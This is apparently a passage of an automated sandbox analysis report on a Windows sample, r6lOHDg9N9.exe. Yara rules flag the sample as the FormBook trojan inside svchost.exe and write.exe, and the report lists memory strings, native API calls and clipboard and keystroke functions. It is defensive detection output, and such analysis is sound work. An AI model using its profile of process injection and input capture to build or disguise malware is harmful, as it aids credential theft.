            Source: write.exe, 00000006.00000003.2272108522.0000000007574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: write.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C403 NtClose,1_2_0042C403
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274340 NtSetContextThread,1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274650 NtSuspendThread,1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F30 NtCreateSection,1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C60 NtCreateKey,1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273090 NtSetValueKey,1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D70 NtOpenThread,1_2_03273D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C4650 NtSuspendThread,LdrInitializeThunk,6_2_044C4650
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C4340 NtSetContextThread,LdrInitializeThunk,6_2_044C4340
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2C60 NtCreateKey,LdrInitializeThunk,6_2_044C2C60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_044C2C70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_044C2CA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_044C2D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_044C2D30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2DD0 NtDelayExecution,LdrInitializeThunk,6_2_044C2DD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_044C2DF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_044C2EE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_044C2E80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2F30 NtCreateSection,LdrInitializeThunk,6_2_044C2F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2FE0 NtCreateFile,LdrInitializeThunk,6_2_044C2FE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2FB0 NtResumeThread,LdrInitializeThunk,6_2_044C2FB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2AD0 NtReadFile,LdrInitializeThunk,6_2_044C2AD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2AF0 NtWriteFile,LdrInitializeThunk,6_2_044C2AF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2B60 NtClose,LdrInitializeThunk,6_2_044C2B60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_044C2BE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_044C2BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_044C2BA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C35C0 NtCreateMutant,LdrInitializeThunk,6_2_044C35C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C39B0 NtGetContextThread,LdrInitializeThunk,6_2_044C39B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2C00 NtQueryInformationProcess,6_2_044C2C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2CC0 NtQueryVirtualMemory,6_2_044C2CC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2CF0 NtOpenProcess,6_2_044C2CF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2D00 NtSetInformationFile,6_2_044C2D00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2DB0 NtEnumerateKey,6_2_044C2DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2E30 NtWriteVirtualMemory,6_2_044C2E30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2EA0 NtAdjustPrivilegesToken,6_2_044C2EA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2F60 NtCreateProcessEx,6_2_044C2F60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2F90 NtProtectVirtualMemory,6_2_044C2F90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2FA0 NtQuerySection,6_2_044C2FA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2AB0 NtWaitForSingleObject,6_2_044C2AB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C2B80 NtQueryInformationFile,6_2_044C2B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C3010 NtOpenDirectoryObject,6_2_044C3010
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C3090 NtSetValueKey,6_2_044C3090
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C3D70 NtOpenThread,6_2_044C3D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C3D10 NtOpenProcessToken,6_2_044C3D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001F8EC0 NtCreateFile,6_2_001F8EC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001F9030 NtReadFile,6_2_001F9030
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001F9120 NtDeleteFile,6_2_001F9120
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001F91C0 NtClose,6_2_001F91C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001F9330 NtAllocateVirtualMemory,6_2_001F9330
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECD2480_2_03ECD248
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004184431_2_00418443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012701_2_00401270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EA031_2_0042EA03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040221C1_2_0040221C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022201_2_00402220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCEF1_2_0040FCEF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCF31_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025041_2_00402504
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025101_2_00402510
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004045E41_2_004045E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041661E1_2_0041661E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004166231_2_00416623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF131_2_0040FF13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF8A1_2_0040DF8A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF931_2_0040DF93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FA01_2_00402FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F41A21_2_032F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032856301_2_03285630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
